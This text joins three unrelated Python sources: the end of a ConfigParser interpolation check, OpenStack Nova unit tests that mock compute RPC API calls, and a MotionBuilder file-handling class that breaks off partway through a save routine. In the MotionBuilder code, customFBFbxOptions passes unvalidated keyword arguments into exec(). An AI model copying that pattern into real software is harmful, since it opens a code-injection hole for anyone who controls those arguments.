# first, replace all "good" interpolations
tmp_value = value.replace('%%', '')
tmp_value = self._interpvar_re.sub('', tmp_value)
# then, check if there's a lone percent sign left
if '%' in tmp_value:
raise ValueError("invalid interpolation syntax in %r at "
"position %d" % (value, tmp_value.find('%')))
ConfigParser.set(self, section, option, value)
|
|
# Copyright 2012, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for nova.compute.rpcapi
"""
import contextlib
import mock
from oslo_config import cfg
from oslo_serialization import jsonutils
from nova.compute import rpcapi as compute_rpcapi
from nova import context
from nova.objects import block_device as objects_block_dev
from nova.objects import compute_node as objects_compute_node
from nova.objects import network_request as objects_network_request
from nova.objects import numa as objects_numa
from nova import test
from nova.tests.unit import fake_block_device
from nova.tests.unit import fake_instance
CONF = cfg.CONF
class ComputeRpcAPITestCase(test.NoDBTestCase):
def setUp(self):
super(ComputeRpcAPITestCase, self).setUp()
self.context = context.get_admin_context()
instance_attr = {'host': 'fake_host',
'instance_type_id': 1}
self.fake_instance_obj = fake_instance.fake_instance_obj(self.context,
**instance_attr)
self.fake_instance = jsonutils.to_primitive(self.fake_instance_obj)
self.fake_volume_bdm = jsonutils.to_primitive(
fake_block_device.FakeDbBlockDeviceDict(
{'source_type': 'volume', 'destination_type': 'volume',
'instance_uuid': self.fake_instance['uuid'],
'volume_id': 'fake-volume-id'}))
def test_serialized_instance_has_name(self):
self.assertIn('name', self.fake_instance)
def _test_compute_api(self, method, rpc_method,
assert_dict=False, **kwargs):
ctxt = context.RequestContext('fake_user', 'fake_project')
rpcapi = kwargs.pop('rpcapi_class', compute_rpcapi.ComputeAPI)()
self.assertIsNotNone(rpcapi.client)
self.assertEqual(rpcapi.client.target.topic, CONF.compute_topic)
orig_prepare = rpcapi.client.prepare
expected_version = kwargs.pop('version', rpcapi.client.target.version)
nova_network = kwargs.pop('nova_network', False)
expected_kwargs = kwargs.copy()
if ('requested_networks' in expected_kwargs and
expected_version == '3.23'):
expected_kwargs['requested_networks'] = []
for requested_network in kwargs['requested_networks']:
if not nova_network:
expected_kwargs['requested_networks'].append(
(requested_network.network_id,
str(requested_network.address),
requested_network.port_id))
else:
expected_kwargs['requested_networks'].append(
(requested_network.network_id,
str(requested_network.address)))
if 'host_param' in expected_kwargs:
expected_kwargs['host'] = expected_kwargs.pop('host_param')
else:
expected_kwargs.pop('host', None)
if 'legacy_limits' in expected_kwargs:
expected_kwargs['limits'] = expected_kwargs.pop('legacy_limits')
kwargs.pop('legacy_limits', None)
expected_kwargs.pop('destination', None)
if assert_dict:
expected_kwargs['instance'] = jsonutils.to_primitive(
expected_kwargs['instance'])
cast_and_call = ['confirm_resize', 'stop_instance']
if rpc_method == 'call' and method in cast_and_call:
if method == 'confirm_resize':
kwargs['cast'] = False
else:
kwargs['do_cast'] = False
if 'host' in kwargs:
host = kwargs['host']
elif 'destination' in kwargs:
host = kwargs['destination']
elif 'instances' in kwargs:
host = kwargs['instances'][0]['host']
else:
host = kwargs['instance']['host']
with contextlib.nested(
mock.patch.object(rpcapi.client, rpc_method),
mock.patch.object(rpcapi.client, 'prepare'),
mock.patch.object(rpcapi.client, 'can_send_version'),
) as (
rpc_mock, prepare_mock, csv_mock
):
prepare_mock.return_value = rpcapi.client
if 'return_bdm_object' in kwargs:
del kwargs['return_bdm_object']
rpc_mock.return_value = objects_block_dev.BlockDeviceMapping()
elif rpc_method == 'call':
rpc_mock.return_value = 'foo'
else:
rpc_mock.return_value = None
csv_mock.side_effect = (
lambda v: orig_prepare(version=v).can_send_version())
retval = getattr(rpcapi, method)(ctxt, **kwargs)
self.assertEqual(retval, rpc_mock.return_value)
prepare_mock.assert_called_once_with(version=expected_version,
server=host)
rpc_mock.assert_called_once_with(ctxt, method, **expected_kwargs)
def test_add_aggregate_host(self):
self._test_compute_api('add_aggregate_host', 'cast',
aggregate={'id': 'fake_id'}, host_param='host', host='host',
slave_info={})
def test_add_fixed_ip_to_instance(self):
self._test_compute_api('add_fixed_ip_to_instance', 'cast',
instance=self.fake_instance_obj, network_id='id',
version='3.12')
def test_attach_interface(self):
self._test_compute_api('attach_interface', 'call',
instance=self.fake_instance_obj, network_id='id',
port_id='id2', version='3.17', requested_ip='192.168.1.50')
def test_attach_volume(self):
self._test_compute_api('attach_volume', 'cast',
instance=self.fake_instance_obj, volume_id='id',
mountpoint='mp', bdm=self.fake_volume_bdm, version='3.16')
def test_change_instance_metadata(self):
self._test_compute_api('change_instance_metadata', 'cast',
instance=self.fake_instance_obj, diff={}, version='3.7')
@mock.patch('nova.compute.rpcapi.ComputeAPI._warn_buggy_live_migrations')
def test_check_can_live_migrate_destination(self, mock_warn):
self._test_compute_api('check_can_live_migrate_destination', 'call',
instance=self.fake_instance_obj,
destination='dest', block_migration=True,
disk_over_commit=True, version='3.32')
self.assertFalse(mock_warn.called)
@mock.patch('nova.compute.rpcapi.ComputeAPI._warn_buggy_live_migrations')
def test_check_can_live_migrate_destination_old_warning(self, mock_warn):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('check_can_live_migrate_destination', 'call',
instance=self.fake_instance_obj,
destination='dest', block_migration=True,
disk_over_commit=True, version='3.0')
mock_warn.assert_called_once_with()
@mock.patch('nova.compute.rpcapi.ComputeAPI._warn_buggy_live_migrations')
def test_check_can_live_migrate_source(self, mock_warn):
self._test_compute_api('check_can_live_migrate_source', 'call',
instance=self.fake_instance_obj,
dest_check_data={"test": "data"}, version='3.32')
self.assertFalse(mock_warn.called)
@mock.patch('nova.compute.rpcapi.ComputeAPI._warn_buggy_live_migrations')
def test_check_can_live_migrate_source_old_warning(self, mock_warn):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('check_can_live_migrate_source', 'call',
instance=self.fake_instance_obj,
dest_check_data={"test": "data"}, version='3.0')
mock_warn.assert_called_once_with()
def test_check_instance_shared_storage(self):
self._test_compute_api('check_instance_shared_storage', 'call',
instance=self.fake_instance_obj, data='foo',
version='3.29')
def test_confirm_resize_cast(self):
self._test_compute_api('confirm_resize', 'cast',
instance=self.fake_instance_obj, migration={'id': 'foo'},
host='host', reservations=list('fake_res'))
def test_confirm_resize_call(self):
self._test_compute_api('confirm_resize', 'call',
instance=self.fake_instance_obj, migration={'id': 'foo'},
host='host', reservations=list('fake_res'))
def test_detach_interface(self):
self._test_compute_api('detach_interface', 'cast',
version='3.17', instance=self.fake_instance_obj,
port_id='fake_id')
def test_detach_volume(self):
self._test_compute_api('detach_volume', 'cast',
instance=self.fake_instance_obj, volume_id='id',
version='3.25')
def test_finish_resize(self):
self._test_compute_api('finish_resize', 'cast',
instance=self.fake_instance_obj, migration={'id': 'foo'},
image='image', disk_info='disk_info', host='host',
reservations=list('fake_res'))
def test_finish_revert_resize(self):
self._test_compute_api('finish_revert_resize', 'cast',
instance=self.fake_instance_obj, migration={'id': 'fake_id'},
host='host', reservations=list('fake_res'))
def test_get_console_output(self):
self._test_compute_api('get_console_output', 'call',
instance=self.fake_instance_obj, tail_length='tl',
version='3.28')
def test_get_console_pool_info(self):
self._test_compute_api('get_console_pool_info', 'call',
console_type='type', host='host')
def test_get_console_topic(self):
self._test_compute_api('get_console_topic', 'call', host='host')
def test_get_diagnostics(self):
self._test_compute_api('get_diagnostics', 'call',
instance=self.fake_instance_obj, version='3.18')
def test_get_instance_diagnostics(self):
self._test_compute_api('get_instance_diagnostics', 'call',
assert_dict=True, instance=self.fake_instance_obj,
version='3.31')
def test_get_vnc_console(self):
self._test_compute_api('get_vnc_console', 'call',
instance=self.fake_instance_obj, console_type='type',
version='3.2')
def test_get_spice_console(self):
self._test_compute_api('get_spice_console', 'call',
instance=self.fake_instance_obj, console_type='type',
version='3.1')
def test_get_rdp_console(self):
self._test_compute_api('get_rdp_console', 'call',
instance=self.fake_instance_obj, console_type='type',
version='3.10')
def test_get_serial_console(self):
self._test_compute_api('get_serial_console', 'call',
instance=self.fake_instance_obj, console_type='serial',
version='3.34')
def test_validate_console_port(self):
self._test_compute_api('validate_console_port', 'call',
instance=self.fake_instance_obj, port="5900",
console_type="novnc", version='3.3')
def test_host_maintenance_mode(self):
self._test_compute_api('host_maintenance_mode', 'call',
host_param='param', mode='mode', host='host')
def test_host_power_action(self):
self._test_compute_api('host_power_action', 'call', action='action',
host='host')
def test_inject_network_info(self):
self._test_compute_api('inject_network_info', 'cast',
instance=self.fake_instance_obj)
def test_live_migration(self):
self._test_compute_api('live_migration', 'cast',
instance=self.fake_instance_obj, dest='dest',
block_migration='blockity_block', host='tsoh',
migrate_data={}, version='3.26')
def test_post_live_migration_at_destination(self):
self._test_compute_api('post_live_migration_at_destination', 'cast',
instance=self.fake_instance_obj,
block_migration='block_migration', host='host', version='3.14')
def test_pause_instance(self):
self._test_compute_api('pause_instance', 'cast',
instance=self.fake_instance_obj)
def test_soft_delete_instance(self):
self._test_compute_api('soft_delete_instance', 'cast',
instance=self.fake_instance_obj,
reservations=['uuid1', 'uuid2'])
def test_swap_volume(self):
self._test_compute_api('swap_volume', 'cast',
instance=self.fake_instance_obj, old_volume_id='oldid',
new_volume_id='newid')
def test_restore_instance(self):
self._test_compute_api('restore_instance', 'cast',
instance=self.fake_instance_obj, version='3.20')
def test_pre_live_migration(self):
self._test_compute_api('pre_live_migration', 'call',
instance=self.fake_instance_obj,
block_migration='block_migration', disk='disk', host='host',
migrate_data=None, version='3.19')
def test_prep_resize(self):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('prep_resize', 'cast',
instance=self.fake_instance_obj, instance_type='fake_type',
image='fake_image', host='host',
reservations=list('fake_res'),
request_spec='fake_spec',
filter_properties={'fakeprop': 'fakeval'},
node='node', version='3.0')
self.flags(compute='3.38', group='upgrade_levels')
self._test_compute_api('prep_resize', 'cast',
instance=self.fake_instance_obj, instance_type='fake_type',
image='fake_image', host='host',
reservations=list('fake_res'),
request_spec='fake_spec',
filter_properties={'fakeprop': 'fakeval'},
node='node', clean_shutdown=True, version='3.38')
def test_reboot_instance(self):
self.maxDiff = None
self._test_compute_api('reboot_instance', 'cast',
instance=self.fake_instance_obj,
block_device_info={},
reboot_type='type')
def test_rebuild_instance(self):
self._test_compute_api('rebuild_instance', 'cast', new_pass='None',
injected_files='None', image_ref='None', orig_image_ref='None',
bdms=[], instance=self.fake_instance_obj, host='new_host',
orig_sys_metadata=None, recreate=True, on_shared_storage=True,
preserve_ephemeral=True, version='3.21')
def test_reserve_block_device_name(self):
self._test_compute_api('reserve_block_device_name', 'call',
instance=self.fake_instance_obj, device='device',
volume_id='id', disk_bus='ide', device_type='cdrom',
version='3.35', return_bdm_object=True)
def refresh_provider_fw_rules(self):
self._test_compute_api('refresh_provider_fw_rules', 'cast',
host='host')
def test_refresh_security_group_rules(self):
self._test_compute_api('refresh_security_group_rules', 'cast',
rpcapi_class=compute_rpcapi.SecurityGroupAPI,
security_group_id='id', host='host')
def test_refresh_security_group_members(self):
self._test_compute_api('refresh_security_group_members', 'cast',
rpcapi_class=compute_rpcapi.SecurityGroupAPI,
security_group_id='id', host='host')
def test_remove_aggregate_host(self):
self._test_compute_api('remove_aggregate_host', 'cast',
aggregate={'id': 'fake_id'}, host_param='host', host='host',
slave_info={})
def test_remove_fixed_ip_from_instance(self):
self._test_compute_api('remove_fixed_ip_from_instance', 'cast',
instance=self.fake_instance_obj, address='addr',
version='3.13')
def test_remove_volume_connection(self):
self._test_compute_api('remove_volume_connection', 'call',
instance=self.fake_instance, volume_id='id', host='host',
version='3.30')
def test_rescue_instance(self):
self.flags(compute='3.9', group='upgrade_levels')
self._test_compute_api('rescue_instance', 'cast',
instance=self.fake_instance_obj, rescue_password='pw',
version='3.9')
self.flags(compute='3.24', group='upgrade_levels')
self._test_compute_api('rescue_instance', 'cast',
instance=self.fake_instance_obj, rescue_password='pw',
rescue_image_ref='fake_image_ref', version='3.24')
self.flags(compute='3.37', group='upgrade_levels')
self._test_compute_api('rescue_instance', 'cast',
instance=self.fake_instance_obj, rescue_password='pw',
rescue_image_ref='fake_image_ref',
clean_shutdown=True, version='3.37')
def test_reset_network(self):
self._test_compute_api('reset_network', 'cast',
instance=self.fake_instance_obj)
def test_resize_instance(self):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('resize_instance', 'cast',
instance=self.fake_instance_obj, migration={'id': 'fake_id'},
image='image', instance_type={'id': 1},
reservations=list('fake_res'), version='3.0')
self.flags(compute='3.37', group='upgrade_levels')
self._test_compute_api('resize_instance', 'cast',
instance=self.fake_instance_obj, migration={'id': 'fake_id'},
image='image', instance_type={'id': 1},
reservations=list('fake_res'),
clean_shutdown=True, version='3.37')
def test_resume_instance(self):
self._test_compute_api('resume_instance', 'cast',
instance=self.fake_instance_obj)
def test_revert_resize(self):
self._test_compute_api('revert_resize', 'cast',
instance=self.fake_instance_obj, migration={'id': 'fake_id'},
host='host', reservations=list('fake_res'))
@mock.patch('nova.compute.rpcapi.ComputeAPI._warn_buggy_live_migrations')
def test_rollback_live_migration_at_destination(self, mock_warn):
self._test_compute_api('rollback_live_migration_at_destination',
'cast', instance=self.fake_instance_obj, host='host',
destroy_disks=True, migrate_data=None, version='3.32')
self.assertFalse(mock_warn.called)
@mock.patch('nova.compute.rpcapi.ComputeAPI._warn_buggy_live_migrations')
def test_rollback_live_migration_at_destination_old_warning(self,
mock_warn):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('rollback_live_migration_at_destination',
'cast', instance=self.fake_instance_obj, host='host',
version='3.0')
mock_warn.assert_called_once_with(None)
def test_run_instance(self):
self._test_compute_api('run_instance', 'cast',
instance=self.fake_instance_obj, host='fake_host',
request_spec='fake_spec', filter_properties={},
requested_networks='networks', injected_files='files',
admin_password='pw', is_first_time=True, node='node',
legacy_bdm_in_spec=False, version='3.27')
def test_set_admin_password(self):
self._test_compute_api('set_admin_password', 'call',
instance=self.fake_instance_obj, new_pass='pw',
version='3.8')
def test_set_host_enabled(self):
self._test_compute_api('set_host_enabled', 'call',
enabled='enabled', host='host')
def test_get_host_uptime(self):
self._test_compute_api('get_host_uptime', 'call', host='host')
def test_backup_instance(self):
self._test_compute_api('backup_instance', 'cast',
instance=self.fake_instance_obj, image_id='id',
backup_type='type', rotation='rotation')
def test_snapshot_instance(self):
self._test_compute_api('snapshot_instance', 'cast',
instance=self.fake_instance_obj, image_id='id')
def test_start_instance(self):
self._test_compute_api('start_instance', 'cast',
instance=self.fake_instance_obj)
def test_stop_instance_cast(self):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('stop_instance', 'cast',
instance=self.fake_instance_obj, version='3.0')
self.flags(compute='3.37', group='upgrade_levels')
self._test_compute_api('stop_instance', 'cast',
instance=self.fake_instance_obj,
clean_shutdown=True, version='3.37')
def test_stop_instance_call(self):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('stop_instance', 'call',
instance=self.fake_instance_obj, version='3.0')
self.flags(compute='3.37', group='upgrade_levels')
self._test_compute_api('stop_instance', 'call',
instance=self.fake_instance_obj,
clean_shutdown=True, version='3.37')
def test_suspend_instance(self):
self._test_compute_api('suspend_instance', 'cast',
instance=self.fake_instance_obj)
def test_terminate_instance(self):
self._test_compute_api('terminate_instance', 'cast',
instance=self.fake_instance_obj, bdms=[],
reservations=['uuid1', 'uuid2'], version='3.22')
def test_unpause_instance(self):
self._test_compute_api('unpause_instance', 'cast',
instance=self.fake_instance_obj)
def test_unrescue_instance(self):
self._test_compute_api('unrescue_instance', 'cast',
instance=self.fake_instance_obj, version='3.11')
def test_shelve_instance(self):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('shelve_instance', 'cast',
instance=self.fake_instance_obj, image_id='image_id',
version='3.0')
self.flags(compute='3.37', group='upgrade_levels')
self._test_compute_api('shelve_instance', 'cast',
instance=self.fake_instance_obj, image_id='image_id',
clean_shutdown=True, version='3.37')
def test_shelve_offload_instance(self):
self.flags(compute='3.0', group='upgrade_levels')
self._test_compute_api('shelve_offload_instance', 'cast',
instance=self.fake_instance_obj,
version='3.0')
self.flags(compute='3.37', group='upgrade_levels')
self._test_compute_api('shelve_offload_instance', 'cast',
instance=self.fake_instance_obj,
clean_shutdown=True, version='3.37')
def test_unshelve_instance(self):
self._test_compute_api('unshelve_instance', 'cast',
instance=self.fake_instance_obj, host='host', image='image',
filter_properties={'fakeprop': 'fakeval'}, node='node',
version='3.15')
def test_volume_snapshot_create(self):
self._test_compute_api('volume_snapshot_create', 'cast',
instance=self.fake_instance_obj, volume_id='fake_id',
create_info={}, version='3.6')
def test_volume_snapshot_delete(self):
self._test_compute_api('volume_snapshot_delete', 'cast',
instance=self.fake_instance_obj, volume_id='fake_id',
snapshot_id='fake_id2', delete_info={}, version='3.6')
def test_external_instance_event(self):
self._test_compute_api('external_instance_event', 'cast',
instances=[self.fake_instance_obj],
events=['event'],
version='3.23')
def test_build_and_run_instance(self):
self._test_compute_api('build_and_run_instance', 'cast',
instance=self.fake_instance_obj, host='host', image='image',
request_spec={'request': 'spec'}, filter_properties=[],
admin_password='passwd', injected_files=None,
requested_networks=['network1'], security_groups=None,
block_device_mapping=None, node='node', limits=[],
version='3.40')
@mock.patch('nova.utils.is_neutron', return_value=True)
def test_build_and_run_instance_icehouse_compat(self, is_neutron):
self.flags(compute='icehouse', group='upgrade_levels')
self._test_compute_api('build_and_run_instance', 'cast',
instance=self.fake_instance_obj, host='host', image='image',
request_spec={'request': 'spec'}, filter_properties=[],
admin_password='passwd', injected_files=None,
requested_networks= objects_network_request.NetworkRequestList(
objects=[objects_network_request.NetworkRequest(
network_id="fake_network_id", address="10.0.0.1",
port_id="fake_port_id")]),
security_groups=None,
block_device_mapping=None, node='node', limits={},
version='3.23')
@mock.patch('nova.utils.is_neutron', return_value=False)
def test_build_and_run_instance_icehouse_compat_nova_net(self, is_neutron):
self.flags(compute='icehouse', group='upgrade_levels')
self._test_compute_api('build_and_run_instance', 'cast',
instance=self.fake_instance_obj, host='host', image='image',
request_spec={'request': 'spec'}, filter_properties=[],
admin_password='passwd', injected_files=None,
requested_networks= objects_network_request.NetworkRequestList(
objects=[objects_network_request.NetworkRequest(
network_id='fake_network_id', address='10.0.0.1')]),
security_groups=None,
block_device_mapping=None, node='node', limits={},
version='3.23', nova_network=True)
def test_quiesce_instance(self):
self._test_compute_api('quiesce_instance', 'call',
instance=self.fake_instance_obj, version='3.39')
def test_unquiesce_instance(self):
self._test_compute_api('unquiesce_instance', 'cast',
instance=self.fake_instance_obj, mapping=None, version='3.39')
@mock.patch('nova.utils.is_neutron', return_value=True)
def test_build_and_run_instance_juno_compat(self, is_neutron):
self.flags(compute='juno', group='upgrade_levels')
self._test_compute_api('build_and_run_instance', 'cast',
instance=self.fake_instance_obj, host='host', image='image',
request_spec={'request': 'spec'}, filter_properties=[],
admin_password='passwd', injected_files=None,
requested_networks= objects_network_request.NetworkRequestList(
objects=[objects_network_request.NetworkRequest(
network_id="fake_network_id", address="10.0.0.1",
port_id="fake_port_id")]),
security_groups=None,
block_device_mapping=None, node='node', limits={},
version='3.33')
@mock.patch('nova.objects.ComputeNode.get_by_host_and_nodename')
@mock.patch('nova.utils.is_neutron', return_value=True)
def test_build_and_run_instance_limits_juno_compat(
self, is_neutron, get_by_host_and_nodename):
host_topology = objects_numa.NUMATopology(cells=[
objects_numa.NUMACell(
id=0, cpuset=set([1, 2]), memory=512,
cpu_usage=2, memory_usage=256,
pinned_cpus=set([1])),
objects_numa.NUMACell(
id=1, cpuset=set([3, 4]), memory=512,
cpu_usage=1, memory_usage=128,
pinned_cpus=set([]))
])
limits = objects_numa.NUMATopologyLimits(
cpu_allocation_ratio=16,
ram_allocation_ratio=2)
cnode = objects_compute_node.ComputeNode(
numa_topology=jsonutils.dumps(
host_topology.obj_to_primitive()))
get_by_host_and_nodename.return_value = cnode
legacy_limits = jsonutils.dumps(
limits.to_dict_legacy(host_topology))
self.flags(compute='juno', group='upgrade_levels')
netreqs = objects_network_request.NetworkRequestList(objects=[
objects_network_request.NetworkRequest(
network_id="fake_network_id",
address="10.0.0.1",
port_id="fake_port_id")])
self._test_compute_api('build_and_run_instance', 'cast',
instance=self.fake_instance_obj,
host='host',
image='image',
request_spec={'request': 'spec'},
filter_properties=[],
admin_password='passwd',
injected_files=None,
requested_networks=netreqs,
security_groups=None,
block_device_mapping=None,
node='node',
limits={'numa_topology': limits},
legacy_limits={'numa_topology': legacy_limits},
version='3.33')
|
|
'''
Author: Jason.Parks
Created: April 25, 2012
Module: core.moBuFile
Purpose: File convenience class
'''
from pyfbsdk import *
from common.core import globalVariables as gv
from common.diagnostic.pcsLogger import moBuLogger
from common.fileIO.parser_schema import ParseSchema
from common.fileIO.pcsPath import Path
from moBu.core.moBuCore import MoBuCore #@UnresolvedImport
#import P4
import getpass
import os
import re
import shutil
schemaObj = ParseSchema(mobu=1)
# eclipseSyntax
if False: from pyfbsdk_gen_doc import * #@UndefinedVariable @UnusedWildImport
class MoBuFile(MoBuCore):
def __init__(self):
""" MoBuFile.__init__(): set initial parameters """
super(MoBuFile, self).__init__()
def cleanDirs(self, folderPath='', dirExtension='.fbm'):
''' Cleans viral .bck/.fbm folders from given folderPath
Params:
folderPath: director to clean
dirExtension: extension to look for on end of dir
Returns: True if cleaned any
'''
deleted = False
if not folderPath:
moBuLogger.error("No folderPath arg passed.")
return False
for root, dirs, unused in os.walk(folderPath):
for _dir in dirs:
dirPath = os.path.join(root, _dir)
if Path(dirPath).isdir:
if re.search(dirExtension, dirPath):
try:
shutil.rmtree(dirPath)
deleted = True
except WindowsError:
moBuLogger.info("Failed to remove '%s'" % dirPath)
return deleted
def customFBFbxOptions(self, pLoad=False, saveAllTakes=True, allElements=True, selection=False, **kwargs):
''' create save/load options
Params:
pLoad: True if loading, False if saving
saveAllTakes: Set to False if save current take only
allElements: Set to False and pass kwargs to save/load/merge specific elements
selection: True to save selected only
Returns: FBFbxOptions object
'''
if self.mobuVer == 2010:
moBuLogger.warning("FBFbxOptions are not valid for 2010")
return None
elif self.mobuVer == 2012 or self.mobuVer == 2013 or self.mobuVer == 2014:
# create object
pFbxOptions = FBFbxOptions(pLoad)
if not allElements:
# set all ElementActions and Base properties to false
pFbxOptions.SetAll(FBElementAction.kFBElementActionDiscard, False)
baseProperties = ['BaseCameras',
'CameraSwitcher', 'CameraSwitcherSettings',
'CurrentCamera', 'CurrentCameraSettings',
'GlobalLighting', 'GlobalLightingSettings',
'Transport', 'TransportSettings',
'EmbedMedia', 'SaveSelectedModelsOnly', ]
for bProperty in baseProperties:
exec('pFbxOptions.%s=False' % bProperty)
# process kwargs
for key in kwargs:
# check for non-strings passed in
if not isinstance(kwargs[key], str):
moBuLogger.error("A non-string type arg was passed in: '%s'" % kwargs[key])
if 'kFBElementAction' in kwargs[key]:
# FBPropertyElementAction
exec('pFbxOptions.%s = FBElementAction.%s' % (key, kwargs[key]))
else:
# FBPropertyBase
exec('pFbxOptions.%s=%s' % (key, kwargs[key]))
# save selected for saves
if not pLoad and selection:
pFbxOptions.SaveSelectedModelsOnly = True
# skip takes
if not saveAllTakes:
currentTake = self.system.CurrentTake
pTakeIndex = 0
for take in self.scene.Takes:
# save current take only
if not pLoad:
if not take.Name == currentTake.Name:
pFbxOptions.SetTakeSelect(pTakeIndex, False)
# merge no takes
else:
pFbxOptions.SetTakeSelect(pTakeIndex, False)
pTakeIndex += 1
# save ASCII
pFbxOptions.UseASCIIFormat = True
return pFbxOptions
else:
moBuLogger.error("Wrong version of MotionBuilder '%s'" % self.mobuVer)
def fixThis(self, message=''):
''' sends scene and email to T.A.
Params:
message: passed message for email
Returns: True/False
'''
successes = 0
#1. Note currentScene name for reload
currentScene = self.sceneName
#2. Enter notes
if not message:
result = FBMessageBoxGetUserValue("Send Message", "Can you tell me what you were doing?", "Nothing to say", FBPopupInputType.kFBPopupString, "Send scene", "Cancel")
if result[0] == 1:
message = result[1]
elif result[0] == 2:
moBuLogger.info("Cancelled mbCore.fixThis()")
return False
#3. Save to network location
savePath = Path('%s/data/%s/fixThis' % (gv.schemaLocation, getpass.getuser()))
saveFilePath = '%s/%s' % (savePath, Path(currentScene).basename())
# make dir
if not os.path.exists(savePath):
os.makedirs(savePath)
if self.savePCSoptions(pathFile=saveFilePath, quiet=True, pOptions=None, p4=False):
moBuLogger.info("Saved scene to: '%s'" % saveFilePath)
successes += 1
else:
moBuLogger.info("Failed to save scene to: '%s'" % saveFilePath)
return False
#4. Email TechArtist
#TODO: email message
_file = open(saveFilePath.replace('.fbx', '.txt'), "w")
_file.write(message)
_file.close()
#5. Reload original scene
if self.loadPCSoptions(pathFile=currentScene, quiet=False, pOptions=None):
successes += 1
else:
moBuLogger.info("Failed to reload original scene: '%s'" % currentScene)
if successes == 2:
return True
else:
return False
def loadPCSoptions(self, pathFile=None, quiet=False, pOptions=None):
''' saves with customFBFbxOptions
Params:
pathFile: complete file path to save
quiet: suppress messages
pOptions: pre-made options
Returns: True/False
'''
# pick file if not passed
if not pathFile:
pathFile = self.openFileDialog(openSave='open')
# # Check for binary
# lFbp = FBProgress()
# lFbp.ProgressBegin()
# lFbp.Caption = "Checking binary on %s" % pathFile.basename
# lFbp.Percent = 50
# if Path(pathFile).isbin:
# moBuLogger.warning("Skipping file '%s' because detected binary" % pathFile)
# lFbp.ProgressDone()
# return False
# moBuLogger.debug("Checked '%s' for binary, passed." % pathFile)
#
# lFbp.ProgressDone()
# check for cancel
if not pathFile:
moBuLogger.info("Cancelled open via loadPCSoptions()")
return False
if not pOptions:
pOptions = self.customFBFbxOptions(pLoad=True)
# by default, load all takes
success = self.app.FileOpen(str(pathFile), 1 - quiet, self.customFBFbxOptions(pLoad=1, saveAllTakes=1, allElements=1))
if success:
moBuLogger.info("Success opening '%s'" % pathFile)
else:
moBuLogger.error("Failed to open '%s'" % pathFile)
# # check for hips
# ref = self.getObject("Reference")
# if ref:
# if len(ref.Children) > 0:
# if not ref.Children[0].Name == 'Hips':
# moBuLogger.infoDialog("WARNING: No Hips found in scene. Check your joint names.", "Joints Missing")
return success
def mergePCSoptions(self, pathFile='', quiet=True, pOptions=None):
''' merges with customFBFbxOptions
Params:
pathFile: complete file path to merge
quiet: suppress messages
pOptions: pre-made options
Returns: True/False
'''
if not pathFile:
pathFile = self.openFileDialog()
if not pOptions:
pOptions = self.customFBFbxOptions(pLoad=True, saveAllTakes=True, allElements=True)
# by default, do NOT merge takes
if self.app.FileMerge(str(pathFile), 1 - quiet, pOptions):
# report
if not quiet:
moBuLogger.info("Merged %s with PCSoptions" % pathFile)
return True
else:
moBuLogger.error("Failed to merge '%s'" % pathFile)
return False
def openFileDialog(self, openSave='open', startPath=''):
''' opens dialog box to select a file
Params:
openSave: open or save file type
startPath: start in path
Returns: path and fileName/False
'''
lFp = FBFilePopup()
lFp.Caption = "Select a file"
if openSave == 'open':
lFp.Style = FBFilePopupStyle.kFBFilePopupOpen
elif openSave == 'save':
lFp.Style = FBFilePopupStyle.kFBFilePopupSave
else:
moBuLogger.error("Illegal arg passed. openSave=%s" % openSave)
# BUG: If we do not set the filter, we will have an exception.
lFp.Filter = "*"
if not startPath:
if not self.sceneName == 'Untitled':
lFp.Path = str(self.sceneName.parent)
else:
lFp.Path = str(schemaObj.artRoot.replace('/', "\\"))
else:
lFp.Path = str(Path(startPath).makePretty(lastSlash=False, backward=True))
# open window
lRes = lFp.Execute()
if lRes:
return lFp.FullFilename
else:
return False
def openFolderDialog(self):
''' opens dialog box to select a folder
Params: none
Returns: path to folder/False
'''
lFp = FBFolderPopup()
lFp.Caption = "Select a folder"
self.app = FBApplication()
if not self.sceneName == 'Untitled':
lFp.Path = str(self.sceneName.parent)
else:
lFp.Path = str(schemaObj.artRoot)
lRes = lFp.Execute()
if lRes:
return lFp.Path
else:
return False
def savePCSoptions(self, pathFile=None, quiet=True, pOptions=None, p4=True):
''' saves with customFBFbxOptions
Params:
pathFile: complete file path to save
quiet: suppress messages
pOptions: pre-made options
p4: markForAdd/checkout or not
Returns: True/False
'''
text = 'Saved with PCSoptions'
# pick file if not passed
if not pathFile:
if not quiet:
pathFile = self.openFileDialog(openSave='save')
else:
moBuLogger.error("No pathFile passed and quiet=True")
return False
if not pathFile:
moBuLogger.info("Cancelled")
return False
# add extension if they didn't type it
if not Path(pathFile).ext:
pathFile = '%s.fbx' % pathFile
# # checkout from perforce
# if p4:
# if self.pcsParseObj.isp4Active:
# self.p4.fileName = pathFile
# if self.p4.isP4Connected:
# try:
# self.p4.p4CheckOut(desc=text)
## except P4.P4Exception:
# except:
# moBuLogger.warning("Failed to checkout: '%s'" % pathFile)
# else:
# if not quiet:
# moBuLogger.warning('P4Active setting FALSE, not checking out.')
# else:
# if not quiet:
# moBuLogger.warning("p4 arg passed as False, not checking out for file: '%s'." % pathFile)
if not pOptions:
pOptions = self.customFBFbxOptions(pLoad=False, saveAllTakes=True)
# 2010 save process
currentTakeObject = FBSystem().CurrentTake
if self.mobuVer == 2010:
lMgr = FBFbxManager() #@UndefinedVariable
lMgr.SaveBegin(str(pathFile))
lMgr.Selected = True
for strEach in lMgr.Takes:
if strEach.Name != currentTakeObject.Name:
strEach.Import = False
lMgr.EmbedMedia = False
lMgr.BaseCameras = False
lMgr.CameraSwitcherSettings = False
lMgr.CurrentCameraSettings = False
lMgr.GlobalLightingSettings = False
lMgr.TransportSettings = False
if not lMgr.Save():
moBuLogger.errorDialog('There is a problem saving the file', 'Cannot Save')
